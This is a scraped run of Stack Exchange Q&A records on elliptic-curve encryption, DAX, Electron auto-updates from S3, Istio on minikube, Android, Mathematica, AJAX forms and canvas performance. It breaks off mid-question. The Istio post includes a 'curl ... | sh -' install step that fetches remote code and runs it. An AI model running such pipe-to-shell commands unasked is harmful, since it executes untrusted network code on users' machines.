$n$ bit strings. Consequently, you can encrypt $n$ bit \nmessages, for instance 256 bit if you use SHA-256 for $H$. For the input to $H$ you need to encode the points of the curve in a suitable way.\nRegarding performance, standard ElGamal on elliptic curves costs two scalar multiplications and one point addition, where Menezes-Vanstone costs you two scalar multiplication and two multiplications in $F_p$. So Menezes-Vanstone will be cheaper from a computational point of view.\nRegarding ciphertext expansion, to encrypt a message (mapped to a point on the curve) with ElGamal, the ciphertext will contain 2 elements of the curve group (which in affine coordinates will be four elements of $F_p$ - and you can bring it down to ~ 2 elements of $F_p$ when using point compression). In Menezes-Vanstone to encrypt a message (which fits into two elements of $F_p$) the ciphertext will contain one element of the curve group (2 elements of $F_p$) and another two elements of $F_p$ (so you have four elements of $F_p$ and using point compression you come down to ~ 3 elements of $F_p$).\nWhen using ElGamal on elliptic curves you can prove that it provides indistinguishability under chosen plaintext attacks (IND-CPA security), where Menezes-Vanstone does not provide IND-CPA security (this paper shows that it is not a probabilistic encryption scheme and thus not IND-CPA secure). So you should definitely not use the Menezes-Vanstone scheme.\nAlternatively, a standardized scheme for public key encryption on elliptic curves is ECIES, which provides stronger security guarantees (IND-CCA security) than ElGamal does (there are ElGamal variants such as Cramer-Shoup wich are IND-CCA secure, but not that efficient as ECIES).\n","meta":{"source":"crypto.stackexchange","title":"What differences between Menezes\u2013Vanstone ECC and ElGamal ECC?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Receiving scalar error on Switch function when using related table\n\nQuestion: Very new to DAX. Trying to use Switch for the first time. Getting 'he expression refers to multiple columns. Multiple columns cannot be converted to a scalar value'. I have been unable to figure out the solution. Here is the code:\n<code>IVC - Delivered Cubic Realization:=SWITCH(\n FILTER('Invoice Fact',RELATED('Product Dimension'[Product Family Code]) = \"PL\"),\n DIVIDE('Invoice Fact'[IVC - Delivered Amount Extended], 'Invoice Fact'[IVC - Cubic Conversion Footage]) * 1000\n ,DIVIDE('Invoice Fact'[IVC - Delivered Amount Extended], 'Invoice Fact'[IVC - Cubic Conversion Footage])\n)\n<\/code>\nComment: can you explain what you are trying to achieve here. The use of the RELATED Function in the DAX does not look appropriate.\nComment: If the Product Family Code on table Product Dimension table = \"PL\" the I want to divide the Delivered Amount Extended by the Cubic Conversion Footage from the Invoice Fact table and multiply it by 1000. If it is not \"PL\", then do the division but not multiply it by 1000.\nComment: Should have mentioned that the Invoice Fact table and the Product Dimension table are linked via a key field.\nComment: can you please provide sample data\nAnswer: I figured out how to do what I needed:\nIVC - Delivered Selling Realization:=VAR ProductFamily = SELECTEDVALUE('Product Dimension'[Product Family Code])\nVAR ProductCategory = SELECTEDVALUE('Product Dimension'[Product Category Code])\nRETURN\nSWITCH(\nTRUE(),\nProductFamily = \"PL\",\nDIVIDE('Invoice Fact'[IVC - Delivered Amount Extended], 'Invoice Fact'[IVC - Billed Selling Footage]) * 1000,\nProductFamily = \"VE\",\nDIVIDE('Invoice Fact'[IVC - Delivered Amount Extended], 'Invoice Fact'[IVC - Billed Selling Footage]) * 1000,\nProductFamily = \"EWP\" && ProductCategory = \"BEAM\",\nDIVIDE('Invoice Fact'[IVC - Delivered Amount Extended], 'Invoice Fact'[IVC - Billed Selling Footage]) * 1000,\nProductFamily = \"LU\" && ProductCategory = \"CORE\",\nDIVIDE('Invoice Fact'[IVC - Delivered Amount Extended], 'Invoice Fact'[IVC - Billed Selling Footage]) * 10,\nDIVIDE('Invoice Fact'[IVC - Delivered Amount Extended], 'Invoice Fact'[IVC - Billed Selling Footage])\n)\n","meta":{"source":"stackoverflow","title":"Receiving scalar error on Switch function when using related table","dup_signals":{}},"subset":"stackexchange"} +{"text":"Auto Updater does not work for Amazon S3 private Bucket\n\nQuestion: \n\nVersion:\n22.9.1\n\nElectron Version:\nElectron Type (current, beta, nightly):\n11.1.0 (stable)\n\nTarget:\nmac OS 11.1\n\nElectron Updater Version:\n4.3.5\n\nI set my S3 to private () and then put the following in my update script:\n<code>.......\nautoUpdater.on('checking-for-update', () => {\n if (w !== undefined) {\n w.get('settings').content().send('check-for-updates-begin');\n }\n\n let opts = {\n service: 's3',\n region: 'eu-central-1',\n host: s3_bucket + '.s3.eu-central-1.amazonaws.com',\n path: '\/latest-mac.yml' \/\/ For example....\n };\n aws4.sign(opts, {\n accessKeyId: \"XXXXX\",\n secretAccessKey: \"XXXXXXXX\"\n });\n\n autoUpdater.requestHeaders = opts.headers;\n });\n........\n<\/code>\nUnfortunately, I then get the following error:\n<code>Error: HttpError: 403 Forbidden\n\"<?xml version=\\\"1.0\\\" encoding=\\\"UTF-8\\\"?>\\n<Error><Code>SignatureDoesNotMatch<\/Code><Message>The request signature we calculated does not match the signature you provided. Check your key and signing method.<\/Message>\n\n.....\n<\/code>\nSomeone a solution for me?\nAnswer: My solution:\nI set the FeedUrl for autoUpdater <code>autoUpdater.setFeedURL('https:\/\/[BUCKET].s3.[REGION].amazonaws.com');<\/code>\nAnswer: If anyone else has a similar issue and setFeedUrl did not work, try this:\nhttps:\/\/github.com\/electron-userland\/electron-builder\/issues\/2355#issuecomment-724842574\n\nUser @scorring posted an elegant solution with correct props\n<code>autoUpdater.on(\"checking-for-update\", async () => {\n let opts = {\n region: \"eu-west-1\",\n protocol: \"https:\",\n hostname: \"BUCKET_NAME.s3.amazonaws.com\",\n path: \"\/PATH\/TO\/latest.yml\",\n host: \"s3-eu-west-1.amazonaws.com\"\n };\n\n await aws4.sign(opts, {\n accessKeyId: \"XXX\",\n secretAccessKey: \"YYY\"\n });\n\n autoUpdater.requestHeaders = opts.headers;\n});\n<\/code>\nThis worked for me\nComment: https:\/\/meta.stackexchange.com\/a\/8259\/997587\n","meta":{"source":"stackoverflow","title":"Auto Updater does not work for Amazon S3 private Bucket","dup_signals":{}},"subset":"stackexchange"} +{"text":"Unable to setup Istio with minikube\n\nQuestion: I followed Istio's official documentation to setup Istio for sample bookinfo app with minikube. but I'm getting Unable to connect to the server: net\/http: TLS handshake timeout error. these are the steps that I have followed(I have kubectl & minikube installed).\n<code>minikube start\ncurl -L https:\/\/git.io\/getLatestIstio | sh -\ncd istio-1.0.3\nexport PATH=$PWD\/bin:$PATH\nkubectl apply -f install\/kubernetes\/helm\/istio\/templates\/crds.yaml\nkubectl apply -f install\/kubernetes\/istio-demo-auth.yaml\nkubectl get pods -n istio-system\n<\/code>\nThis is the terminal output I'm getting\n<code>$ kubectl get pods -n istio-system\nNAME READY STATUS RESTARTS AGE\ngrafana-9cfc9d4c9-xg7bh 1\/1 Running 0 4m\nistio-citadel-6d7f9c545b-lwq8s 1\/1 Running 0 3m\nistio-cleanup-secrets-69hdj 0\/1 Completed 0 4m\nistio-egressgateway-75dbb8f95d-k6xj2 1\/1 Running 0 4m\nistio-galley-6d74549bb9-mdc97 0\/1 ContainerCreating 0 4m\nistio-grafana-post-install-xz9rk 0\/1 Completed 0 4m\nistio-ingressgateway-6bd4957bc-vhbct 1\/1 Running 0 4m\nistio-pilot-7f8c49bbd8-x6bmm 0\/2 Pending 0 4m\nistio-policy-6c65d8cff4-hx2c7 2\/2 Running 0 4m\nistio-security-post-install-gjfj2 0\/1 Completed 0 4m\nistio-sidecar-injector-74855c54b9-nnqgx 0\/1 ContainerCreating 0 3m\nistio-telemetry-65cdd46d6c-rqzfw 2\/2 Running 0 4m\nistio-tracing-ff94688bb-hgz4h 1\/1 Running 0 3m\nprometheus-f556886b8-chdxw 1\/1 Running 0 4m\nservicegraph-778f94d6f8-9xgw5 1\/1 Running 0 3m\n\n$kubectl describe pod istio-galley-6d74549bb9-mdc97\nError from server (NotFound): pods \"istio-galley-5bf4d6b8f7-8s2z9\" not found\n<\/code>\npod describe output\n<code> $ kubectl -n istio-system describe pod istio-galley-6d74549bb9-mdc97\nName: istio-galley-6d74549bb9-mdc97\nNamespace: istio-system\nNode: minikube\/172.17.0.4\nStart Time: Sat, 03 Nov 2018 04:29:57 +0000\nLabels: istio=galley\n pod-template-hash=1690826493\nAnnotations: scheduler.alpha.kubernetes.io\/critical-pod=\n sidecar.istio.io\/inject=false\nStatus: Pending\nIP:\nControlled By: ReplicaSet\/istio-galley-5bf4d6b8f7\nContainers:\n validator:\n Container ID:\n Image: gcr.io\/istio-release\/galley:1.0.0 Image ID:\n Ports: 443\/TCP, 9093\/TCP Host Ports: 0\/TCP, 0\/TCP\n Command: \/usr\/local\/bin\/galley\n validator --deployment-namespace=istio-system\n --caCertFile=\/etc\/istio\/certs\/root-cert.pem\n --tlsCertFile=\/etc\/istio\/certs\/cert-chain.pem\n --tlsKeyFile=\/etc\/istio\/certs\/key.pem\n --healthCheckInterval=2s\n --healthCheckFile=\/health\n --webhook-config-file\n \/etc\/istio\/config\/validatingwebhookconfiguration.yaml\n State: Waiting\n Reason: ContainerCreating\n Ready: False\n Restart Count: 0\n Requests:\n cpu: 10m\n Liveness: exec [\/usr\/local\/bin\/galley probe --probe-path=\/health --interval=4s] delay=4s timeout=1s period=4s #success=1 #failure=3\n Readiness: exec [\/usr\/local\/bin\/galley probe --probe-path=\/health --interval=4s] delay=4s timeout=1s period=4s #success=1 #failure=3\n Environment: <none>\n Mounts:\n \/etc\/istio\/certs from certs (ro)\n \/etc\/istio\/config from config (ro)\n \/var\/run\/secrets\/kubernetes.io\/serviceaccount from istio-galley-service-account-token-9pcmv(ro)\nConditions:\n Type Status\n Initialized True\n Ready False\n PodScheduled True\nVolumes:\n certs:\n Type: Secret (a volume populated by a Secret)\n SecretName: istio.istio-galley-service-account\n Optional: false\n config:\n Type: ConfigMap (a volume populated by a ConfigMap)\n Name: istio-galley-configuration\n Optional: false\n istio-galley-service-account-token-9pcmv:\n Type: Secret (a volume populated by a Secret)\n SecretName: istio-galley-service-account-token-9pcmv\n Optional: false\nQoS Class: Burstable\nNode-Selectors: <none>\nTolerations: node.kubernetes.io\/not-ready:NoExecute for 300s\n node.kubernetes.io\/unreachable:NoExecute for 300s\nEvents:\n Type Reason Age From Message\n ---- ------ ---- ---- -------\n Normal Scheduled 1m default-scheduler Successfully assigned istio-galley-5bf4d6b8f7-8t8qz to minikube\n Normal SuccessfulMountVolume 1m kubelet, minikube MountVolume.SetUp succeeded for volume \"config\"\n Normal SuccessfulMountVolume 1m kubelet, minikube MountVolume.SetUp succeeded for volume \"istio-galley-service-account-token-9pcmv\"\n Warning FailedMount 27s (x7 over 1m) kubelet, minikube MountVolume.SetUp failed for volume \"certs\" : secrets \"istio.istio-galley-service-account\" not found\n<\/code>\nafter some time :-\n<code> $ kubectl describe pod istio-galley-6d74549bb9-mdc97\n\nUnable to connect to the server: net\/http: TLS handshake timeout\n<\/code>\nso I wait for istio-sidecar-injector and istio-galley containers to get created. If I again run kubectl get pods -n istio-system or any other kubectl commands gives Unable to connect to the server: net\/http: TLS handshake timeout error. \nPlease help me with this issue.\nps: I'm running minikube on ubuntu 16.04\nThanks in advance.\nComment: Can you post the output for `kubectl describe pod istio-galley-6d74549bb9-mdc97`\nComment: question updated please take a look.\nComment: Sorry: `kubectl -n istio-system describe pod istio-galley-6d74549bb9-mdc97`\nComment: updated the question please take a look.\nComment: @Mahendra Hegde, Does `minikube logs` command show any suspicious events?\nComment: thanks. Problem resolved. when I run minikube start --memory=4048. maybe it was a memory issue.\nAnswer: Looks like you are running into this and this the secret <code>istio.istio-galley-service-account<\/code> is missing in your <code>istio-system<\/code> namespace. You can try the workaround as described:\n\nInstall as outlined in the docs: https:\/\/istio.io\/docs\/setup\/kubernetes\/minimal-install\/ the missing secret is created by the citadel pod which isn't running due to the --set security.enabled=false flag, setting that to true starts citadel and the secret is created.\nComment: sorry. that did not help. somehow gallery and ingress are running now. but I'm facing the same problem with deployed applications.they are not initializing and after some time , I'm getting \"Unable to connect to the server: net\/http: TLS handshake timeout\" error.\nAnswer: Problem resolved. when I run <code>minikube start --memory=4048<\/code>. maybe it was a memory issue.\nComment: Almost certainly was; this is exactly how minikube behaves when it is short of either memory or CPU.\nAnswer: When using either the <code>istio-demo.yaml<\/code> or <code>istio-demo-auth.yaml<\/code>, you'll find that a minimum of 4GB RAM is required to run Istio (particularly when you deploy its sample app, BookInfo, too). This is true whether your running MiniKube or Docker Desktop and is one of the gotchas that Meshery identifies and attempts to help those deploying Istio or other service meshes circumvent.\n","meta":{"source":"stackoverflow","title":"Unable to setup Istio with minikube","dup_signals":{}},"subset":"stackexchange"} +{"text":"Pass data between two fragments in same activity and update WebView\n\nQuestion: Hello I'm trying to pass a String value from a fragment to another one. I have a single Activity.\nThe thing that I'm trying to do is when a listview item is pressed send the value to the another fragment, load the fragment (This I had made with this code): \n<code>Fragment cambiarFragment = new FragmentInterurbanos();\n Bundle args = new Bundle();\nFragmentTransaction transaction = getFragmentManager().beginTransaction();\n\n transaction\n .replace(R.id.container, cambiarFragment)\n .addToBackStack(null)\n .setCustomAnimations(R.anim.slide_in_left, R.anim.slide_out_right);\n\n \/\/ Commit the transaction\n transaction.commit();\n<\/code>\nAnd then retrieve the String and update a WebView placed in the new fragment (This method cannot be launched when the user select in NavigationDrawer this section (Fragment).\nThanks for your help in advance!\nComment: if you are sending String from fragment to fragment then try [Communicating Fragments](http:\/\/developer.android.com\/training\/basics\/fragments\/communicating.html)\nAnswer: There are many ways you can achieve this... you could pass the string to the new Fragment through a Bundle like this:\n<code>Bundle bundle = new Bundle();\nbundle.putString(key, value);\nfragment.setArguments(bundle);\n<\/code>\nor maybe have a DataController class where you store the string and the new fragment retrieves it.\n","meta":{"source":"stackoverflow","title":"Pass data between two fragments in same activity and update WebView","dup_signals":{}},"subset":"stackexchange"} +{"text":"ndsolve solution goes to zero for large domain\n\nQuestion: I am trying to solve numerically the diffusion equation with absorbing boundary conditions on a finite domain. The initial condition is an approximation of a delta function centered in x0 with standard deviation sigma. \nI find that changing the size of the domain slightly has a dramatic (non-physical) effect on the solution evaluated at a finite time. Why is this? Why don't I get a warning from Mathematica? This code reproduces the problem:\n<code>sigma = 1\/32;\nT = 10;\nx0 = 1;\nL = 24;\nsol1 = NDSolve[{D[pn[x, t], {t, 1}] == 1\/8 D[pn[x, t], {x, 2}], \npn[0, t] == 0, pn[L, t] == 0, \npn[x, 0] == 1\/Sqrt[2 Pi sigma^2] Exp[-(x - x0)^2\/(2 sigma^2)]}, \npn[x, t], {x, 0, L}, {t, 0, T}];\nL = 26;\nsol2 = NDSolve[{D[pn[x, t], {t, 1}] == 1\/8 D[pn[x, t], {x, 2}], \npn[0, t] == 0, pn[L, t] == 0, \npn[x, 0] == 1\/Sqrt[2 Pi sigma^2] Exp[-(x - x0)^2\/(2 sigma^2)]}, \npn[x, t], {x, 0, L}, {t, 0, T}];\nt = T;\nGraphicsRow[{Plot[Evaluate[pn[x, t] \/. sol1], {x, 0, 24}, \nPlotRange -> All], \nPlot[Evaluate[pn[x, t] \/. sol2], {x, 0, 26}, PlotRange -> All]}]\n<\/code>\nOn the left I plot the solution with domain size L=24, on the right I plot the solution with L=26. As you can see, the change is dramatic (notice the y axis values) and Mathematica produces no warning.\nHow can I solve this issue and be able to solve the equation numerically for L larger than 24?\nComment: Tip; Setting the variable of integration `t` to a numeric value with `t = T` messes things up when you (or I) recompute the solutions. It's very inconvenient. You can avoid needing such a workaround by solving for `pn` instead of `pn[x, t]` in your `NDSolve` calls. Alternatively, you could use the code `pn[x, t] \/. sol \/. t -> T`.\nAnswer: You have control the quality of the grid\/mesh of the spatial variable. Either with <code>\"MaxStepSize\"<\/code>:\n<code>NDSolve[{D[ppn[x, t], {t, 1}] == 1\/8 D[ppn[x, t], {x, 2}], \n ppn[0, t] == 0, ppn[L, t] == 0, \n ppn[x, 0] == \n 1\/Sqrt[2 Pi sigma^2] Exp[-(x - x0)^2\/(2 sigma^2)]}, ppn, {x, 0, \n L}, {t, 0, T},\n Method -> {\"MethodOfLines\", \n \"SpatialDiscretization\" -> {\"TensorProductGrid\", \n \"MaxStepSize\" -> 1}}]\n<\/code>\nor with <code>\"MinPoints\"<\/code>:\n<code>NDSolve[{D[ppn[x, t], {t, 1}] == 1\/8 D[ppn[x, t], {x, 2}], \n ppn[0, t] == 0, ppn[L, t] == 0, \n ppn[x, 0] == \n 1\/Sqrt[2 Pi sigma^2] Exp[-(x - x0)^2\/(2 sigma^2)]}, ppn, {x, 0, \n L}, {t, 0, T},\n Method -> {\"MethodOfLines\", \n \"SpatialDiscretization\" -> {\"TensorProductGrid\", \n \"MinPoints\" -> Ceiling@L}}]\n<\/code>\n","meta":{"source":"mathematica.stackexchange","title":"ndsolve solution goes to zero for large domain","dup_signals":{}},"subset":"stackexchange"} +{"text":"Issue in loading images from web\n\nQuestion: I am new in android and had developed an app which get images from the website and display it. I got it working in emulator but not in real phones. In some device, it will crash or take very long loading period. Can anyone please help me or guide me in improving it as i'm not sure whether the way i loads the images is correct or not.\nHere are the code i use to get the images from the web and display accordingly. \n<code>if (xmlURL.length() != 0) {\n\n try {\n URL url = new URL(xmlURL);\n SAXParserFactory spf = SAXParserFactory.newInstance();\n SAXParser sp = spf.newSAXParser();\n\n\/* Get the XMLReader of the SAXParser we created. *\/\nXMLReader xr = sp.getXMLReader();\n\/*\n * Create a new ContentHandler and apply it to the\n * XML-Reader\n *\/\nxr.setContentHandler(myExampleHandler);\n\n\/* Parse the xml-data from our URL. *\/\nxr.parse(new InputSource(url.openStream()));\n\/* Parsing has finished. *\/\n\n\/*\n * Our ExampleHandler now provides the parsed data to\n * us.\n *\/\nParsedExampleDataSet parsedExampleDataSet = myExampleHandler.getParsedData();\n\n } catch (Exception e) {\n\n }\n }\n\n if (s.equalsIgnoreCase(\"wallpapers\")) {\n Context context = helloAndroid.this.getBaseContext();\n\n for (int j = 0; j <= myExampleHandler.filenames.size() - 1; j++) {\n if (myExampleHandler.filenames.elementAt(j).toString() != null) {\n helloAndroid.this.ed = myExampleHandler.thumbs.elementAt(j)\n .toString();\n if (helloAndroid.this.ed.length() != 0) {\n Drawable image = ImageOperations(context,\n helloAndroid.this.ed, \"image.jpg\");\n file_info = myExampleHandler.filenames\n .elementAt(j).toString();\n author = \"\\nby \"\n + myExampleHandler.authors.elementAt(j)\n .toString();\n switch (j + 1) {\n case 1:\n ImageView imgView1 = new ImageView(context);\n imgView1 = (ImageView) findViewById(R.id.image1);\n if (image.getIntrinsicHeight() > 0) {\n imgView1.setImageDrawable(image);\n } else\n imgView1\n .setImageResource(R.drawable.empty_wallpaper);\n tv = (TextView) findViewById(R.id.filename1);\n tv.setText(file_info);\n tv = (TextView) findViewById(R.id.author1);\n tv.setText(author);\n imgView1\n .setOnClickListener(new View.OnClickListener() {\n public void onClick(View view) {\n \/\/ Perform action on click\n Intent myIntent1 = new Intent(\n helloAndroid.this,\n galleryFile.class);\n Bundle b = new Bundle();\n b.putString(\"fileID\",myExampleHandler.fileid.elementAt(0).toString());\n b.putString(\"page\", \"1\");\n b.putString(\"family\", s);\n b.putString(\"fi\",myExampleHandler.folder_id.elementAt(folder).toString());\n b.putString(\"kw\", keyword);\n myIntent1.putExtras(b);\n startActivityForResult(\n myIntent1, 0);\n }\n });\n break;\n case 2:\n ImageView imgView2 = new ImageView(context);\n imgView2 = (ImageView) findViewById(R.id.image2);\n imgView2.setImageDrawable(image);\n tv = (TextView) findViewById(R.id.filename2);\n tv.setText(file_info);\n tv = (TextView) findViewById(R.id.author2);\n tv.setText(author);\n imgView2\n .setOnClickListener(new View.OnClickListener() {\n public void onClick(View view) {\n \/\/ Perform action on click\n Intent myIntent1 = new Intent(\n helloAndroid.this,\n galleryFile.class);\n Bundle b = new Bundle();\n b.putString(\"fileID\",myExampleHandler.fileid.elementAt(1).toString());\n b.putString(\"page\", \"1\");\n b.putString(\"family\", s);\n b.putString(\"fi\",myExampleHandler.folder_id.elementAt(folder).toString());\n b.putString(\"kw\", keyword);\n myIntent1.putExtras(b);\n startActivityForResult(\n myIntent1, 0);\n }\n });\n break;\n case 3:\n \/\/same code\n break;\n }\n }\n}\n\n }\n }\n private Drawable ImageOperations(Context ctx, String url,\n String saveFilename) {\n try {\n InputStream is = (InputStream) this.fetch(url);\n Drawable d = Drawable.createFromStream(is, \"src\");\n return d;\n } catch (MalformedURLException e) {\n e.printStackTrace();\n return null;\n } catch (IOException e) {\n e.printStackTrace();\n return null;\n }\n }\n\n public Object fetch(String address) throws MalformedURLException,\n IOException {\n URL url = new URL(address);\n Object content = url.getContent();\n return content;\n }\n<\/code>\nComment: are your images in XML format, then? or why do you use the SAXParser?\nComment: The XML is for grabbing the url.\n\nIt might have something to do with the actual Internet Connection Speed. \n\nTry running the image grabber in a separate thread.\nComment: the xml is to retrieve the image info.\nComment: i had try to load the images with different thread but fail. Can you provide me some guidance? Thanks a lot.\nComment: could you provide the logcat content from the crashes? It would help to narrow down the problem to see the exception you get.\nComment: i am sorry as i do not have the log cat now as it crashes on mobile device and not in my emulator. Thus i could not get the log cat.\nAnswer: Yes, you can get logcat from your device are you aware of how to connect to usb and push the file over via adb commands?\nComment: erm... i am not aware of it. however, i do not have the device with me as well as i send my apps to testers from other countries. Is there any other ways i could get the logcat or how can i get the logcat from the mobile owner?\nComment: do a google search there are two or more libs that allow you to do that..ie get logcat and error trace form mobile device user to debug via putting those libs i n your application and calling a few methods..\n\nTwo libs Log Collector and stack trace collector\n\nLink for stack trace:\n\nhttp:\/\/code.google.com\/p\/android-remote-stacktrace\n\nYou will l need to set Read.logs in your manifest and of course internet permission so you can get the error report via http form the user\nComment: Ok.. Thanks a lot. i will try to get the log cat and update it here. =)\nComment: By the way, can you all teach me on how to modify my code so that i can grab my images in separate thread? ask i had try previously got cant make it right. I want to put it in another thread is because i want to display a loading image while it is loading.\nComment: search the main android dev blog Romain Guy did a blog post on that several months ago or search anddev.org forums\n","meta":{"source":"stackoverflow","title":"Issue in loading images from web","dup_signals":{}},"subset":"stackexchange"} +{"text":"Send multiple contact form from one page via AJAX\n\nQuestion: I have 3 contact form in one page ( Header, Body, Footer ). The code works correctly if sent from one form. I want to use one AJAX request for all forms. That is, when you click on the submit button, so that the code checks if this form then send data to php. How can i do it right? I use the <code>hasClass ()<\/code> method of jquery, but I have errors in the console\nHTML:\nFooter Form\n<code><form id=\"contact-form1\" method=\"POST\" class=\"d-flex form\">\n <input type=\"text\" class=\"simple-input\" id=\"name\" placeholder=\"Name\">\n <input type=\"text\" class=\"simple-input\" id=\"email\" placeholder=\"Email address\">\n <textarea class=\"quession-input\" id=\"msg\" placeholder=\"Your question\"><\/textarea>\n <div class=\"checkboks custom-sq\">\n <input type=\"checkbox\" class=\"checked-checkbox\" name=\"myCheckboxes[]\" id=\"box1\" checked=\"checked\" value=\"true\" \/>\n <label for=\"box1\" class=\"checkboks-text\"><?php echo the_field('checkbox_text', 'option'); ?><\/label>\n <\/div>\n <button type=\"submit\" id=\"submit\" class=\"danger-btn submit1\"><?php echo the_field('btn_send', 'option'); ?><\/button>\n<\/form>\n<\/code>\nAnother Form\n<code><form id=\"contact-form\" method=\"POST\" class=\"d-flex form\">\n <input type=\"text\" class=\"simple-input\" id=\"hy_name\" placeholder=\"Name\">\n <input type=\"text\" class=\"simple-input\" id=\"hy_email\" placeholder=\"Email address\">\n <textarea class=\"quession-input\" id=\"hy_msg\" placeholder=\"Your question\"><\/textarea>\n <div class=\"checkboks custom-sq\">\n <input type=\"checkbox\" id=\"box3\" class=\"checked-checkbox\" checked=\"checked\" \/>\n <label for=\"box3\" class=\"checkboks-text\"><?php echo the_field('checkbox_text', 'option'); ?><\/label>\n <\/div>\n <button type=\"submit\" id=\"submit\" class=\"danger-btn hy-submit submit2\"><?php echo the_field('btn_send', 'option'); ?><\/button>\n<\/form>\n<\/code>\njQuery:\n<code>jQuery('#submit').on('click', function(e) {\n e.preventDefault();\n if(e.hasClass('submit1')) {\n var name = jQuery('#name').val();\n var email = jQuery('#email').val();\n var msg = jQuery('#msg').val();\n var subj = jQuery('#subj').val(); \n var data = \"action=send_email&name=\" + name + \"&email=\" + email + \"&msg=\" + msg + \"&subj=\" + subj + \"&myCheckboxes=\" + choice, \n } elseif (e.hasClass('submit2')) {\n var hy_name = jQuery('#hy_name').val();\n var hy_email = jQuery('#hy_email').val();\n var hy_msg = jQuery('#hy_msg').val();\n var data = \"action=send_email&name=\" + hy_name + \"&email=\" + hy_email + \"&msg=\" + hy_msg + \"&myCheckboxes=\" + choice, \n\n }\n validateEmail(email);\n if (msg == '' || email == '' || validateEmail(jQuery('#email').val()) == false) {\n validateEmail(email);\n validateText(jQuery('#msg'));\n validateText(jQuery('#name'));\n return false;\n }\n\n var chkElem = document.getElementsByName(\"myCheckboxes[]\");\n var choice =\"\";\n\n for(var i=0; i< chkElem.length; i++)\n {\n if(chkElem[i].checked)\n choice = choice + chkElem[i].value;\n }\n\n jQuery.ajax({\n type: \"post\",\n url: \"\/wp-admin\/admin-ajax.php\",\n data: data;\n success: function (response) {\n jQuery('#contact-form input').val('');\n jQuery('#contact-form textarea').val('');\n jQuery('.submit').text('Done!');\n },\n error: function (jqXHR, textStatus, errorThrown) {\n console.log(textStatus);\n }\n });\n\n});\n<\/code>\nPHP:\n<code>add_action('wp_ajax_nopriv_send_email', 'send_email');\nadd_action('wp_ajax_send_email', 'send_email');\nfunction send_email() {\n\n $checkbox = $_POST['myCheckboxes'];\n if (isset($checkbox)) {\n echo $checkbox;\n }\n $headers = 'Content-Type: text\/html; charset=\"utf-8\"';\n $name = $_POST['name'];\n $hy_name = $_POST['hy_name'];\n $from = 'email@example.com';\n $to = 'email@example.com';\n $email = $_POST['email'];\n $hy_email = $_POST['hy_email'];\n $msg = $_POST['msg'];\n $hy_msg = $_POST['hy_msg'];\n $subject = 'Footer form: ' . $_POST['email'];\n $message .= (!empty($name)) ? '<p><strong>User Name<\/strong> : ' . $name .' <\/p>' : '';\n $message .= (!empty($email)) ? '<p><strong>User Email<\/strong> : '. $email .'<\/p>' : '';\n $message .= (!empty($msg)) ? '<p><strong>User Message<\/strong> : '.$msg .'<\/p>' : '';\n $message .= (!empty($checkbox)) ? '<p><strong>Checkboxs<\/strong> : '.$checkbox .'<\/p>' : '';\n $message .= '<\/body><\/html>';\n echo mail($to, $subject, $message, $headers);\n return $msg;\n die();\n}\n<\/code>\nComment: ___but I have errors in the console___ WHat errors, please show us\nComment: An `id` in html has to be UNIQUE on the page, you are using `id=\"submit\"` for both buttons\nComment: @RiggsFolly But how do I do it right? You can not use one id? but when pressed checked from what form is sent?\nAnswer: You can use method <code>serialize()<\/code>, and use a class to identifique buttons submit. Using two identical ids on one page is not good practice.\nIf you use the class <code>.submit<\/code> per example in each button submit:\n<code>$('.submit').on('click', function(e) {\n e.preventDefault();\n var data = $(this).closest('form').serialize();\n\n [...]\n}\n<\/code>\n","meta":{"source":"stackoverflow","title":"Send multiple contact form from one page via AJAX","dup_signals":{}},"subset":"stackexchange"} +{"text":"Heroku mLab MongoDB add-on vs MongoDB Atlas\n\nQuestion: I am using MongoDB Atlas with my Heroku app.\nI have seen that there is an mLab MongoDB add-on on Heroku, as mLab is part MongoDB Atlas now, was is the advantage of using this add-on ?\nMoreover, the add-on looks like a more expensive solution than MongoDB Atlas...\nAnswer: You should use the new MongoDB Atlas Heroku app. mLab heroku app will be deprecated when the migration done, see the doc from migrating from mLab to Atlas\n\nMongoDB plans to build an integration between MongoDB Atlas and Heroku. You will be able to continue to use mLab via its add-on at Heroku until the new integration is available.\nComment: This is not really answering my question: I am already using Heroku and Atlas without add-on on my app, my question is what is the advantage to link Heroku and Atlas with the mLab add-on?\nAnswer: Now this add on feature is no more useful as mlab has already been acquired by MongoDB.\nEarlier the purpose of this feature was that the mLab Add-on used to be co-located with your application in case you have selected this option and could help in reducing the latency of your application as <code>mlab<\/code> was available primarily in US regions.\nBut now mlab has been acquired by MongoDB and you can deploy Atlas cluster in the same region of your application to reduce the latency.\nI hope this answer your question.\n","meta":{"source":"stackoverflow","title":"Heroku mLab MongoDB add-on vs MongoDB Atlas","dup_signals":{}},"subset":"stackexchange"} +{"text":"Fabricjs loadFromJSON performance\n\nQuestion: I have one canvas which can load different pages, how exactly this works on javascript? I have lets say <code>object<\/code> which contain this data and after i change page i am doing something like <code>delete object;<\/code> which i believe free ram so my app can use this again. First 5 pages canvas is smooth and nice but after those with <code>loadFromJSON<\/code> canvas get really heavy, freezing from time to time. On mac with safari webpage get more then 600mb RAM, which is not happening on chrome for example but work on canvas feel same laggy on both browsers. If there any way to refresh canvas or something like that?\nAnswer: First to optimise canvas performance you can try to initiate it with <code>renderOnAddRemove: true<\/code> option:\n<code>canvas = new fabric.Canvas('canvasId', {\n renderOnAddRemove: true\n});\n<\/code>\nand then call <code>canvas.renderAll()<\/code> after all needed changes are done.\nComment: You can try, as I said. this property disables redrawing the whole canvas after each object is added\/removed, so that may save resources on that step.\n","meta":{"source":"stackoverflow","title":"Fabricjs loadFromJSON performance","dup_signals":{}},"subset":"stackexchange"} +{"text":"I want to change my administrator password but am receiving an error\"manipulation token authentication error\"\n\nQuestion: \nPossible Duplicate:\nAuthentication token manipulation error \n\nI want to change my ubuntu 11.10 administrator account password but when i am about to do so, i get an error that \"passwd:Manipulation Token Authentication Error\" and then in the next statement get\"passwd:password unchanged\"...So can anyone help me out by finding a solution to this problem?\nComment: read this: http:\/\/askubuntu.com\/questions\/91188\/authentication-token-manipulation-error\nAnswer: In recent versions of Ubuntu, the filesystem is mounted as read-only, so you need to enter the follow command to get it to remount as read-write, which will allow you to make changes : \n<code>mount -o rw,remount \/\n<\/code>\nNot doing this will cause that error.\n","meta":{"source":"askubuntu","title":"I want to change my administrator password but am receiving an error\"manipulation token authentication error\"","dup_signals":{}},"subset":"stackexchange"} +{"text":"HTMl Table Width issue when added new table below to show effect like freeze pane\n\nQuestion: I using the code to create header freeze table but the width of both the tables are not matching. Here is the Code\n\n<code><div id=\"view_feedback_table\">\n<table 